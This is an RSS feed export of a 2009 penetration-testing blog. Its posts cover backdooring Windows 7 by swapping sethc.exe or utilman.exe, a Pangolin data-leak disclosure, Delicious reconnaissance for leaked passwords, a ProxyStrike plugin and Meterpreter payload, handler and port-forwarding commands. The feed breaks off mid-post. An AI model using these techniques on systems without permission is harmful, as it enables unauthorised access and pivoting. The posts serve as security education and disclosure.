<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-9218613</atom:id><lastBuildDate>Tue, 10 Nov 2009 10:00:12 +0000</lastBuildDate><title>Laramies Corner</title><description>Information Security, Penetration Testing and interesting things</description><link>http://laramies.blogspot.com/</link><managingEditor>noreply@blogger.com (Christian Martorella)</managingEditor><generator>Blogger</generator><openSearch:totalResults>131</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" href="http://feeds.feedburner.com/LaramiesCorner" type="application/rss+xml" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com" /><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-2618543589435844344</guid><pubDate>Mon, 09 Nov 2009 23:08:00 +0000</pubDate><atom:updated>2009-11-10T11:00:12.741+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">windows 7</category><category domain="http://www.blogger.com/atom/ns#">bypass</category><category domain="http://www.blogger.com/atom/ns#">sticky keys</category><category domain="http://www.blogger.com/atom/ns#">hacking</category><category domain="http://www.blogger.com/atom/ns#">utilman</category><title>Owning Windows 7 - Double hack (physical access required)</title><description>&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Hi all, i finished my Windows 7 upgrade and i decided to check and old trick that worked on XP and &lt;a href="http://laramies.blogspot.com/2008/05/windos-vista-easy-hack.html"&gt;Vista&lt;/a&gt;, no foo required, it's an easy one:&lt;/div&gt;&lt;div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;If you have access to a Windows 7 Box, you can still replace the binary c:\windows\system32\&lt;b&gt;sethc.exe&lt;/b&gt; by your favourite backdoor (you can insert the &lt;a href="http://www.room362.com/blog/2009/11/3/metasploit-blends-in-new-msfpayloadencode.html"&gt;same binary with the meterpreter embedded&lt;/a&gt;) and trigger it pressing 5 times the shift key on the login screen. Also the trick works by replacing c:\windows\system32\&lt;b&gt;utilman.ex&lt;/b&gt;e, and pressing WIN-U in the login screen. (you must boot with a live CD in order to replace the binaries)&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;I know, i know..  if someone have access to your machine it's game over, but hey this it's still there and this could have been improved and avoid the direct calling of two binaries by a key combination.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;You can see the double cmd.exe popping one for sethc.exe and the other for utilman.exe, both with "&lt;b&gt;nt authority\system&lt;/b&gt;" privileges.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 500px; height: 290px;" src="http://3.bp.blogspot.com/_CzwlRHDUh5c/SvijF_zV4pI/AAAAAAAAArE/O5JeMrq31rE/s320/windows7-tricks.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5402247076452360850" /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;If you don't have your disk encrypted you should do it... if you have it encrypted, beware with the &lt;a href="http://theinvisiblethings.blogspot.com/2009/10/evil-maid-goes-after-truecrypt.html"&gt;Evil Maid&lt;/a&gt;.&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;Enjoy,&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;Christian&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-2618543589435844344?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/11/windows-7-double-hack-physical-access.html</link><author>noreply@blogger.com (Christian Martorella)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_CzwlRHDUh5c/SvijF_zV4pI/AAAAAAAAArE/O5JeMrq31rE/s72-c/windows7-tricks.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-15383997385433028</guid><pubDate>Fri, 08 May 2009 16:42:00 +0000</pubDate><atom:updated>2009-05-12T10:16:01.943+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">sql injection</category><category domain="http://www.blogger.com/atom/ns#">incident</category><category domain="http://www.blogger.com/atom/ns#">Oracle</category><title>Pangolin and your data</title><description>&lt;div style="text-align: justify;"&gt;This will be a brief entry about a dubious behavior of Pangolin (SQL Injection Tool). Today we were checking some of the features of Pangolin, and i had special interest on the ORACLE UTL_HTPP injection, i checked the options and there wasn't a configuration for the local HTTP server, so i was wondering how the hell they got the results back.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;So i started Pangolin against a test server, and there wasn't any open port in my machine, next step my coworker Javi,  launched the attack and sniffed the traffic, all the injection was urlencoded+Oracle (char) encoding, after decoding we found that the results of the injection is sent to a nosec.org web server, and then Pangolin perform a GET to retrieve the data. WTH?&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;At least let the user know what are you doing with the data, i don't think this will make penetration testers happy, knowing that they customers data is traveling via a third party server.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Be careful where you send your data ;)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;-CMM&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-15383997385433028?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/05/pangolin-and-your-data.html</link><author>noreply@blogger.com (Christian Martorella)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-891685089996710569</guid><pubDate>Tue, 28 Apr 2009 20:28:00 +0000</pubDate><atom:updated>2009-04-28T23:32:27.710+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">information gathering</category><category domain="http://www.blogger.com/atom/ns#">delicious</category><category domain="http://www.blogger.com/atom/ns#">Penetration test</category><title>Information Gathering: Delicious</title><description>&lt;div style="text-align: right;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_CzwlRHDUh5c/Sfd0Q0x3CdI/AAAAAAAAAQk/eVmtM0BXn7g/s1600-h/delicious_logo.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 243px; height: 72px;" src="http://4.bp.blogspot.com/_CzwlRHDUh5c/Sfd0Q0x3CdI/AAAAAAAAAQk/eVmtM0BXn7g/s320/delicious_logo.png" alt="" id="BLOGGER_PHOTO_ID_5329856516410771922" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;Here is a new source that could help you during a Penetration Test, it's not a source that will give you results most of the times, but hey! maybe you are lucky.&lt;br /&gt;&lt;br /&gt;Delicious is a service for keeping your bookmarks in one place (online), it's social bookmarking.&lt;br /&gt;&lt;br /&gt;So let's go with an example; if you have some nicknames from your target, you can search directly on their Delicious profile, all their public links, for example my profile:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:times new roman;"&gt;http://delicious.com/laramies&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Remember that users  can mark a link as private,  but here is where we can be lucky if they forget to save it as private.&lt;br /&gt;&lt;br /&gt;Another way of searching in Delicious, is using target company URL's or IP's, in this example i will use just a standard internal ip:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:times new roman;"&gt;192.168.1.1&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;And look the second result:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_CzwlRHDUh5c/Sfdt4rbytWI/AAAAAAAAAQc/3He2JZxgK7g/s1600-h/delicious.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 310px;" src="http://2.bp.blogspot.com/_CzwlRHDUh5c/Sfdt4rbytWI/AAAAAAAAAQc/3He2JZxgK7g/s320/delicious.png" alt="" id="BLOGGER_PHOTO_ID_5329849504515667298" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;The root password in the url :)&lt;br /&gt;&lt;br /&gt;In particular cases you can obtain interesting results&lt;br /&gt;&lt;br /&gt;-CMM&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-891685089996710569?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/04/information-gathering-delicious.html</link><author>noreply@blogger.com (Christian Martorella)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_CzwlRHDUh5c/Sfd0Q0x3CdI/AAAAAAAAAQk/eVmtM0BXn7g/s72-c/delicious_logo.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-7259731636872785859</guid><pubDate>Tue, 28 Apr 2009 20:00:00 +0000</pubDate><atom:updated>2009-04-28T22:10:01.639+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">tools</category><category domain="http://www.blogger.com/atom/ns#">webapps</category><category domain="http://www.blogger.com/atom/ns#">proxystrike</category><title>ProxyStrike Plugins update</title><description>Well this is a short post, just to let you know that the plugins framework of ProxyStrike is updated, making easier to develop your own plugins. Here is a diagram of the internal structure:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_-xXcbzWG3ug/SfHvtf3_u4I/AAAAAAAAAHg/jovD7Ff-niw/s1600/struct.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 471px; height: 335px;" src="http://4.bp.blogspot.com/_-xXcbzWG3ug/SfHvtf3_u4I/AAAAAAAAAHg/jovD7Ff-niw/s1600/struct.png" alt="" border="0" /&gt;&lt;/a&gt;Now each plugin is a file, and here is an example of a plugin for gathering all the email addresses:&lt;br /&gt;&lt;br /&gt;&lt;pre  class="prettyprint" style="font-family:times new roman;"&gt;&lt;span style="font-size:85%;"&gt;&lt;span class="kwd"&gt;class&lt;/span&gt;&lt;span class="pln"&gt; email_detect&lt;/span&gt;&lt;span class="pun"&gt;(&lt;/span&gt;&lt;span class="typ"&gt;AttackPlugin&lt;/span&gt;&lt;span class="pun"&gt;):&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;       &lt;/span&gt;&lt;span class="kwd"&gt;def&lt;/span&gt;&lt;span class="pln"&gt; __init__&lt;/span&gt;&lt;span class="pun"&gt;(&lt;/span&gt;&lt;span class="kwd"&gt;self&lt;/span&gt;&lt;span class="pun"&gt;):&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;               &lt;/span&gt;&lt;span class="typ"&gt;AttackPlugin&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;__init__&lt;/span&gt;&lt;span class="pun"&gt;(&lt;/span&gt;&lt;span class="kwd"&gt;self&lt;/span&gt;&lt;span class="pun"&gt;,&lt;/span&gt;&lt;span class="pln"&gt;name&lt;/span&gt;&lt;span class="pun"&gt;=&lt;/span&gt;&lt;span class="str"&gt;"email detect"&lt;/span&gt;&lt;span class="pun"&gt;,&lt;/span&gt;&lt;span class="pln"&gt;variableSet&lt;/span&gt;&lt;span class="pun"&gt;=&lt;/span&gt;&lt;span class="kwd"&gt;False&lt;/span&gt;&lt;span class="pun"&gt;,&lt;/span&gt;&lt;span class="pln"&gt;iface&lt;/span&gt;&lt;span class="pun"&gt;=&lt;/span&gt;&lt;span class="kwd"&gt;True&lt;/span&gt;&lt;span class="pun"&gt;,&lt;/span&gt;&lt;span class="pln"&gt;type&lt;/span&gt;&lt;span class="pun"&gt;=&lt;/span&gt;&lt;span class="str"&gt;"tree"&lt;/span&gt;&lt;span class="pun"&gt;,&lt;/span&gt;&lt;span class="pln"&gt;fields&lt;/span&gt;&lt;span class="pun"&gt;=[&lt;/span&gt;&lt;span class="str"&gt;"Url"&lt;/span&gt;&lt;span class="pun"&gt;,&lt;/span&gt;&lt;span class="str"&gt;"Email"&lt;/span&gt;&lt;span class="pun"&gt;])&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;&lt;br /&gt;               &lt;/span&gt;&lt;span class="kwd"&gt;self&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;emailre&lt;/span&gt;&lt;span class="pun"&gt;=&lt;/span&gt;&lt;span class="pln"&gt;re&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;compile&lt;/span&gt;&lt;span class="pun"&gt;(&lt;/span&gt;&lt;span class="str"&gt;"[a-z0-9_.-]+@[a-z0-9_.-]+"&lt;/span&gt;&lt;span class="pun"&gt;,&lt;/span&gt;&lt;span class="pln"&gt;re&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;I&lt;/span&gt;&lt;span class="pun"&gt;)&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;&lt;br /&gt;       &lt;/span&gt;&lt;span class="kwd"&gt;def&lt;/span&gt;&lt;span class="pln"&gt; process&lt;/span&gt;&lt;span class="pun"&gt;(&lt;/span&gt;&lt;span class="kwd"&gt;self&lt;/span&gt;&lt;span class="pun"&gt;,&lt;/span&gt;&lt;span class="pln"&gt;req&lt;/span&gt;&lt;span class="pun"&gt;):&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;               html&lt;/span&gt;&lt;span class="pun"&gt;=&lt;/span&gt;&lt;span class="pln"&gt;req&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;response&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;getContent&lt;/span&gt;&lt;span class="pun"&gt;()&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;               a&lt;/span&gt;&lt;span class="pun"&gt;=&lt;/span&gt;&lt;span class="kwd"&gt;self&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;emailre&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;findall&lt;/span&gt;&lt;span class="pun"&gt;(&lt;/span&gt;&lt;span class="pln"&gt;html&lt;/span&gt;&lt;span class="pun"&gt;)&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;               results&lt;/span&gt;&lt;span class="pun"&gt;=[]&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;               &lt;/span&gt;&lt;span class="kwd"&gt;for&lt;/span&gt;&lt;span class="pln"&gt; i &lt;/span&gt;&lt;span class="kwd"&gt;in&lt;/span&gt;&lt;span class="pln"&gt; a&lt;/span&gt;&lt;span class="pun"&gt;:&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;                       results&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;append&lt;/span&gt;&lt;span class="pun"&gt;([&lt;/span&gt;&lt;span class="pln"&gt;i&lt;/span&gt;&lt;span class="pun"&gt;])&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;               &lt;/span&gt;&lt;span class="kwd"&gt;if&lt;/span&gt;&lt;span class="pln"&gt; a&lt;/span&gt;&lt;span class="pun"&gt;:&lt;/span&gt;&lt;span class="pln"&gt; &lt;br /&gt;                       &lt;/span&gt;&lt;span class="kwd"&gt;self&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;putRESULTS&lt;/span&gt;&lt;span class="pun"&gt;([&lt;/span&gt;&lt;span class="pln"&gt;req&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;completeUrl&lt;/span&gt;&lt;span class="pun"&gt;,&lt;/span&gt;&lt;span class="pln"&gt;results&lt;/span&gt;&lt;span class="pun"&gt;])&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt; You can find more examples inside the plugin folder, just get your copy via subversion:&lt;br /&gt;&lt;br /&gt;  &lt;span style="font-size:85%;"&gt;&lt;tt id="checkoutcmd"&gt;svn checkout &lt;strong&gt;&lt;em&gt;http&lt;/em&gt;&lt;/strong&gt;://proxystrike.googlecode.com/svn/trunk/ proxystrike-read-only&lt;/tt&gt;&lt;/span&gt; &lt;br /&gt;&lt;br /&gt;More information in the &lt;a href="http://code.google.com/p/proxystrike/w/list"&gt;wiki&lt;/a&gt;, and you can follow updates by deepbit in his new &lt;a href="http://deesec.com/"&gt;blog&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Enjoy&lt;br /&gt;&lt;br /&gt;-CMM&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-7259731636872785859?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/04/proxystrike-plugins-update.html</link><author>noreply@blogger.com (Christian Martorella)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_-xXcbzWG3ug/SfHvtf3_u4I/AAAAAAAAAHg/jovD7Ff-niw/s72-c/struct.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-8244992451559481875</guid><pubDate>Mon, 20 Apr 2009 20:00:00 +0000</pubDate><atom:updated>2009-04-21T00:40:26.413+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">postexploitation</category><category domain="http://www.blogger.com/atom/ns#">meterpreter</category><category domain="http://www.blogger.com/atom/ns#">metasploit</category><title>Meterpreter  Post exploitation - Recap</title><description>&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;I have been a big fan of Meterpreter since it first version, now i would like to review the different cool things and plugins that are around for this feature of Metasploit, that covers the post-exploitation phase. As explained in the first &lt;a href="http://www.nologin.org/Downloads/Papers/meterpreter.pdf"&gt;Meterpreter paper&lt;/a&gt;:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 10.0px Helvetica"&gt;&lt;span class="Apple-style-span"  style="font-family:georgia;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;span class="Apple-style-span"  style="font-family:georgia;"&gt;&lt;blockquote&gt;&lt;p style="text-align: justify;margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font: normal normal normal 10px/normal Helvetica; "&gt;&lt;span class="Apple-style-span"  style="font-family:georgia;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;Meterpreter, short for&lt;/span&gt;&lt;/span&gt;&lt;span style="font: 12.0px Helvetica"&gt;&lt;span class="Apple-style-span"  style="font-family:georgia;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-family:georgia;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;The Meta-Interpreter, is an advanced payload &lt;/span&gt;&lt;/span&gt;&lt;span style="font: 12.0px Helvetica"&gt;&lt;span class="Apple-style-span"  style="font-family:georgia;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;span class="Apple-style-span"   style="  ;font-family:Helvetica;font-size:10px;"&gt;&lt;span class="Apple-style-span"  style="font-family:georgia;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;that is included in the Metasploit Framework. &lt;span class="Apple-style-span"   style="  ;font-family:Helvetica;font-size:10px;"&gt;&lt;span class="Apple-style-span"  style="font-family:georgia;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;Its purpose is to provide complex&lt;/span&gt;&lt;/span&gt;&lt;span style="font: 12.0px Helvetica"&gt;&lt;span class="Apple-style-span"  style="font-family:georgia;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt; &lt;span class="Apple-style-span"   style="  ;font-family:Helvetica;font-size:10px;"&gt;&lt;span class="Apple-style-span"  style="font-family:georgia;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;and advanced features that would otherwise be tedious to implement purely&lt;/span&gt;&lt;/span&gt;&lt;span style="font: 12.0px Helvetica"&gt;&lt;span class="Apple-style-span"  style="font-family:georgia;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt; &lt;span class="Apple-style-span"   style="  ;font-family:Helvetica;font-size:10px;"&gt;&lt;span class="Apple-style-span"  style="font-family:georgia;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;in assembly. The way that it accomplishes this is by allowing developers to&lt;/span&gt;&lt;/span&gt;&lt;span style="font: 12.0px Helvetica"&gt;&lt;span class="Apple-style-span"  style="font-family:georgia;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt; &lt;span class="Apple-style-span"   style="  ;font-family:Helvetica;font-size:10px;"&gt;&lt;span class="Apple-style-span"  style="font-family:georgia;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;write their own extensions in the form of shared ob ject (DLL) ﬁles that can&lt;/span&gt;&lt;/span&gt;&lt;span style="font: 12.0px Helvetica"&gt;&lt;span class="Apple-style-span"  style="font-family:georgia;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt; &lt;span class="Apple-style-span"   style="  ;font-family:Helvetica;font-size:10px;"&gt;&lt;span class="Apple-style-span"  style="font-family:georgia;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;be uploaded and injected into a running process on a target computer after&lt;/span&gt;&lt;/span&gt;&lt;span style="font: 12.0px Helvetica"&gt;&lt;span class="Apple-style-span"  style="font-family:georgia;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt; &lt;span class="Apple-style-span"   style="  ;font-family:Helvetica;font-size:10px;"&gt;&lt;span class="Apple-style-span"  style="font-family:georgia;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;exploitation has occurred. Meterpreter and all of the extensions that it loads&lt;/span&gt;&lt;/span&gt;&lt;span style="font: 12.0px Helvetica"&gt;&lt;span class="Apple-style-span"  style="font-family:georgia;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt; &lt;span class="Apple-style-span"   style="  ;font-family:Helvetica;font-size:10px;"&gt;&lt;span class="Apple-style-span"  style="font-family:georgia;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;are executed entirely from memory and never touch the disk, thus allowing them&lt;/span&gt;&lt;/span&gt;&lt;span style="font: 12.0px Helvetica"&gt;&lt;span class="Apple-style-span"  style="font-family:georgia;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt; &lt;span class="Apple-style-span"   style="  ;font-family:Helvetica;font-size:10px;"&gt;&lt;span class="Apple-style-span"  style="font-family:georgia;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;to execute under the radar of standard Anti-Virus detection.&lt;/span&gt;&lt;/span&gt;&lt;span style="font: 12.0px Helvetica"&gt;&lt;span class="Apple-style-span"  style="font-family:georgia;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;First of all, i would like to remark that i use &lt;a href="http://laramies.blogspot.com/2005/10/using-meterpreter-as-standalone.html"&gt;Meterpreter as a standalone&lt;/a&gt; binary most of the times. To create a binary for uploading to a server you can use this command:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span"  style="font-family:'times new roman';"&gt;&lt;span class="Apple-style-span"  style="color:#009900;"&gt;./msfpayload windows/meterpreter/bind_tcp LPORT=443 X &gt; mymeterpreter.exe&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Once uploaded the binary and executed (i leave this to you), you have to launch the multi_handler exploit to manage the connection to meterpreter, in this case:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span"  style="font-family:'times new roman';"&gt;&lt;span class="Apple-style-span"  style="color:#009900;"&gt;./mscli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 E&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Or inside the metasploit console:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span"  style="color:#009900;"&gt;msf &gt; use exploit/multi/handler&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span"  style="color:#009900;"&gt;msf exploit(handler) &gt; set PAYLOAD windows/meterpreter/bind_tcp&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span"  style="color:#009900;"&gt;msf exploit(handler)&gt;  set LPORT 443&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span"  style="color:#009900;"&gt;msf exploit(handler)&gt;  exploit&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Well once we have a working connection, these are some things that you can do:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;-Port forwarding:  You can make port redirections, &lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span"  style="font-family:'times new roman';"&gt;&lt;span class="Apple-style-span"  style="color:#009900;"&gt;meterpreter&gt; portfwd -a -L 127.0.0.1 -l 444 -h destiny -p 3389&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;-L = ip that will hold the listening port&lt;/div&gt;&lt;div style="text-align: justify;"&gt;-l  = the listening port &lt;/div&gt;&lt;div style="text-align: justify;"&gt;-h = the target host&lt;/div&gt;&lt;div style="text-align: justify;"&gt;-p = the target port&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Now you should connect to the exploited machine on port 444&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;More on forwarding and routing &lt;a href="http://hkashfi.blogspot.com/2008/04/bypassing-firewalls-with-port.html"&gt;here&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br 